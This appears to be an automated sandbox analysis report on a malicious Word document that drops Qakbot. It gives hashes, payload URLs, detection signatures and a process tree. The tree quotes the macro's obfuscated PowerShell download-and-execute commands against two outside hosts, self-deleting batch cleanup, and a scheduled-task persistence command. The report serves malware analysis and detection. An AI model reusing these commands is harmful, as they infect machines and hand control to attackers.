Analysis
max time kernel: 140s
max time network: 146s
platform: windows10_x64
resource: win10v200430
submitted: 09-06-2020 11:55
Static task: static1
Behavioral task: behavioral1
Sample: AGRMT_06052020_195.doc
Resource: win7v200430
General
Target: AGRMT_06052020_195.doc
Size: 220KB
MD5: bc8cf7a3c840dc88cfa89f69852e46e6
SHA1: 1528a5750c9072ebbc963687079c010b18240c9e
SHA256: e0dffa6bd2f4dd302690fc57b659149f59c394b4235edf33bf6a10ba0873dafc
SHA512: c2ed63d68e2f23917f448e8bda38058f7c6c02fce9b6fdd474983bed4e0e089759407d214f5eb307eb58101017a9918fae0307bdd10d1634ff26084eed7ea317
Malware Config
Extracted: http://salwadm.com/tcphx/8888888.png
Extracted: http://flipkenya.com/nujazbwrhjy/8888888.png
Extracted: qakbot (spx135, 1591627649)
Signatures

Blacklisted process makes network request (2 IoCs)
Processes:
  flow 15  pid 3388  powershell.exe
  flow 18  pid 764   powershell.exe

Checks processor information in registry (2 TTPs, 3 IoCs)
Processor information is often read in order to detect sandboxing environments.
Processes:
  Key opened         \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0  WINWORD.EXE
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz  WINWORD.EXE
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString  WINWORD.EXE

Suspicious behavior: EnumeratesProcesses (22 IoCs)
Processes:
  pid 3388  powershell.exe
  pid 3388  powershell.exe
  pid 3388  powershell.exe
  pid 764   powershell.exe
  pid 764   powershell.exe
  pid 764   powershell.exe
  pid 3420  file2.exe
  pid 3420  file2.exe
  pid 3416  file2.exe
  pid 3416  file2.exe
  pid 3416  file2.exe
  pid 3416  file2.exe
  pid 1992  nniglk.exe
  pid 1992  nniglk.exe
  pid 1612  nniglk.exe
  pid 1612  nniglk.exe
  pid 1612  nniglk.exe
  pid 1612  nniglk.exe
  pid 1912  explorer.exe
  pid 1912  explorer.exe
  pid 1912  explorer.exe
  pid 1912  explorer.exe

Creates scheduled task(s) (1 TTPs, 1 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.

Suspicious use of AdjustPrivilegeToken (2 IoCs)
Processes:
  Token: SeDebugPrivilege  pid 3388  powershell.exe
  Token: SeDebugPrivilege  pid 764   powershell.exe

Suspicious use of FindShellTrayWindow (2 IoCs)
Processes:
  pid 1164  WINWORD.EXE
  pid 1164  WINWORD.EXE

Suspicious behavior: MapViewOfSection (1 IoCs)
Processes:
  pid 1992  nniglk.exe

Enumerates system info in registry (2 TTPs, 3 IoCs)
Processes:
  Key opened         \REGISTRY\MACHINE\Hardware\Description\System\BIOS  WINWORD.EXE
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily  WINWORD.EXE
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU  WINWORD.EXE

Checks SCSI registry key(s) (3 TTPs, 12 IoCs)
SCSI information is often read in order to detect sandboxing environments.
Processes:
  Key opened         \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000  nniglk.exe
  Key value queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\DeviceDesc  nniglk.exe
  Key value queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Service  nniglk.exe
  Key value queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\DeviceDesc  file2.exe
  Key value queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Service  file2.exe
  Key value queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Service  nniglk.exe
  Key opened         \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000  file2.exe
  Key opened         \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000  nniglk.exe
  Key value queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\DeviceDesc  nniglk.exe
  Key opened         \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000  file2.exe
  Key value queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\DeviceDesc  file2.exe
  Key value queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Service  file2.exe

Suspicious behavior: AddClipboardFormatListener (2 IoCs)
Processes:
  pid 1164  WINWORD.EXE
  pid 1164  WINWORD.EXE

Suspicious use of WriteProcessMemory (30 IoCs)
Processes:
  PID 1164 wrote to memory of 3992  1164 WINWORD.EXE  cmd.exe
  PID 1164 wrote to memory of 3992  1164 WINWORD.EXE  cmd.exe
  PID 1164 wrote to memory of 3332  1164 WINWORD.EXE  cmd.exe
  PID 1164 wrote to memory of 3332  1164 WINWORD.EXE  cmd.exe
  PID 1164 wrote to memory of 3416  1164 WINWORD.EXE  cmd.exe
  PID 1164 wrote to memory of 3416  1164 WINWORD.EXE  cmd.exe
  PID 1164 wrote to memory of 2352  1164 WINWORD.EXE  cmd.exe
  PID 1164 wrote to memory of 2352  1164 WINWORD.EXE  cmd.exe
  PID 1164 wrote to memory of 1532  1164 WINWORD.EXE  cmd.exe
  PID 1164 wrote to memory of 1532  1164 WINWORD.EXE  cmd.exe
  PID 1164 wrote to memory of 3972  1164 WINWORD.EXE  cmd.exe
  PID 1164 wrote to memory of 3972  1164 WINWORD.EXE  cmd.exe
  PID 1164 wrote to memory of 3532  1164 WINWORD.EXE  cmd.exe
  PID 1164 wrote to memory of 3532  1164 WINWORD.EXE  cmd.exe
  PID 3420 wrote to memory of 3416  3420 file2.exe  file2.exe
  PID 3420 wrote to memory of 3416  3420 file2.exe  file2.exe
  PID 3420 wrote to memory of 3416  3420 file2.exe  file2.exe
  PID 3420 wrote to memory of 1992  3420 file2.exe  nniglk.exe
  PID 3420 wrote to memory of 1992  3420 file2.exe  nniglk.exe
  PID 3420 wrote to memory of 1992  3420 file2.exe  nniglk.exe
  PID 3420 wrote to memory of 3928  3420 file2.exe  schtasks.exe
  PID 3420 wrote to memory of 3928  3420 file2.exe  schtasks.exe
  PID 3420 wrote to memory of 3928  3420 file2.exe  schtasks.exe
  PID 1992 wrote to memory of 1612  1992 nniglk.exe  nniglk.exe
  PID 1992 wrote to memory of 1612  1992 nniglk.exe  nniglk.exe
  PID 1992 wrote to memory of 1612  1992 nniglk.exe  nniglk.exe
  PID 1992 wrote to memory of 1912  1992 nniglk.exe  explorer.exe
  PID 1992 wrote to memory of 1912  1992 nniglk.exe  explorer.exe
  PID 1992 wrote to memory of 1912  1992 nniglk.exe  explorer.exe
  PID 1992 wrote to memory of 1912  1992 nniglk.exe  explorer.exe

Executes dropped EXE (4 IoCs)
Processes:
  pid 3420  file2.exe
  pid 3416  file2.exe
  pid 1992  nniglk.exe
  pid 1612  nniglk.exe

Suspicious use of SetWindowsHookEx (9 IoCs)
Processes:
  pid 1164  WINWORD.EXE
  pid 1164  WINWORD.EXE
  pid 1164  WINWORD.EXE
  pid 1164  WINWORD.EXE
  pid 1164  WINWORD.EXE
  pid 1164  WINWORD.EXE
  pid 1164  WINWORD.EXE
  pid 1164  WINWORD.EXE
  pid 1164  WINWORD.EXE

Process spawned unexpected child process (7 IoCs)
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
  Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process  pid 3992  parent 1164  cmd.exe  WINWORD.EXE
  Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process  pid 3332  parent 1164  cmd.exe  WINWORD.EXE
  Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process  pid 3416  parent 1164  cmd.exe  WINWORD.EXE
  Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process  pid 2352  parent 1164  cmd.exe  WINWORD.EXE
  Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process  pid 1532  parent 1164  cmd.exe  WINWORD.EXE
  Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process  pid 3972  parent 1164  cmd.exe  WINWORD.EXE
  Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process  pid 3532  parent 1164  cmd.exe  WINWORD.EXE
Processes
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
  "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\AGRMT_06052020_195.doc" /o ""
  - Checks processor information in registry
  - Suspicious use of FindShellTrayWindow
  - Enumerates system info in registry
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of WriteProcessMemory
  - Suspicious use of SetWindowsHookEx
    C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c mkdir C:\Users\Public\tmpdir
      - Process spawned unexpected child process
    C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /C choice /C Y /N /D Y /T 1 & Del C:\Users\Public\tmp.bat
      - Process spawned unexpected child process
        C:\Windows\system32\choice.exe
          choice /C Y /N /D Y /T 1
    C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('aHR0cDovL3NhbHdhZG0uY29tL3RjcGh4Lzg4ODg4ODgucG5n')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:\Users\Public\1.txt
      - Process spawned unexpected child process
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('aHR0cDovL3NhbHdhZG0uY29tL3RjcGh4Lzg4ODg4ODgucG5n')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e')
          - Blacklisted process makes network request
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
    C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:\Users\Public\tmpdir\tmps1.bat & del C:\Users\Public\1.txt
      - Process spawned unexpected child process
        C:\Windows\system32\choice.exe
          choice /C Y /N /D Y /T 65
    C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('aHR0cDovL2ZsaXBrZW55YS5jb20vbnVqYXpid3JoankvODg4ODg4OC5wbmc=')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '2' + '.e' + 'x' + 'e') >C:\Users\Public\2.txt
      - Process spawned unexpected child process
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('aHR0cDovL2ZsaXBrZW55YS5jb20vbnVqYXpid3JoankvODg4ODg4OC5wbmc=')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '2' + '.e' + 'x' + 'e')
          - Blacklisted process makes network request
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
    C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:\Users\Public\tmpdir\tmps2.bat & del C:\Users\Public\2.txt
      - Process spawned unexpected child process
        C:\Windows\system32\choice.exe
          choice /C Y /N /D Y /T 65
    C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\Users\Public\tmpdir\tmps2.bat
      - Process spawned unexpected child process
        C:\Windows\System32\cmd.exe
          C:\Windows\System32\cmd.exe /C choice /C Y /N /D Y /T 2
            C:\Windows\system32\choice.exe
              choice /C Y /N /D Y /T 2
        C:\Users\Public\tmpdir\file2.exe
          C:\Users\Public\tmpdir\file2.exe
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of WriteProcessMemory
          - Executes dropped EXE
            C:\Users\Public\tmpdir\file2.exe
              C:\Users\Public\tmpdir\file2.exe /C
              - Suspicious behavior: EnumeratesProcesses
              - Checks SCSI registry key(s)
              - Executes dropped EXE
            C:\Users\Admin\AppData\Roaming\Microsoft\Armbughouj\nniglk.exe
              C:\Users\Admin\AppData\Roaming\Microsoft\Armbughouj\nniglk.exe
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious behavior: MapViewOfSection
              - Suspicious use of WriteProcessMemory
              - Executes dropped EXE
                C:\Users\Admin\AppData\Roaming\Microsoft\Armbughouj\nniglk.exe
                  C:\Users\Admin\AppData\Roaming\Microsoft\Armbughouj\nniglk.exe /C
                  - Suspicious behavior: EnumeratesProcesses
                  - Checks SCSI registry key(s)
                  - Executes dropped EXE
                C:\Windows\SysWOW64\explorer.exe
                  C:\Windows\SysWOW64\explorer.exe
                  - Suspicious behavior: EnumeratesProcesses
            C:\Windows\SysWOW64\schtasks.exe
              "C:\Windows\system32\schtasks.exe" /Create /RU "NT AUTHORITY\SYSTEM" /tn txtmhfdmqz /tr "\"C:\Users\Public\tmpdir\file2.exe\" /I txtmhfdmqz" /SC ONCE /Z /ST 14:09 /ET 14:21
              - Creates scheduled task(s)
Downloads
- C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
- C:\Users\Admin\AppData\Roaming\Microsoft\Armbughouj\nniglk.dat
- C:\Users\Admin\AppData\Roaming\Microsoft\Armbughouj\nniglk.exe
- C:\Users\Admin\AppData\Roaming\Microsoft\Armbughouj\nniglk.exe
- C:\Users\Admin\AppData\Roaming\Microsoft\Armbughouj\nniglk.exe
- C:\Users\Public\1.txt
- C:\Users\Public\tmp.bat
- C:\Users\Public\tmpdir\file2.exe
- C:\Users\Public\tmpdir\file2.exe
- C:\Users\Public\tmpdir\file2.exe
- C:\Users\Public\tmpdir\tmps2.bat
- memory/1612-19-0x00000000027E0000-0x00000000027E1000-memory.dmp (Filesize: 4KB)
- memory/1992-20-0x00000000022D0000-0x000000000230A000-memory.dmp (Filesize: 232KB)
- memory/3416-15-0x0000000002700000-0x0000000002701000-memory.dmp (Filesize: 4KB)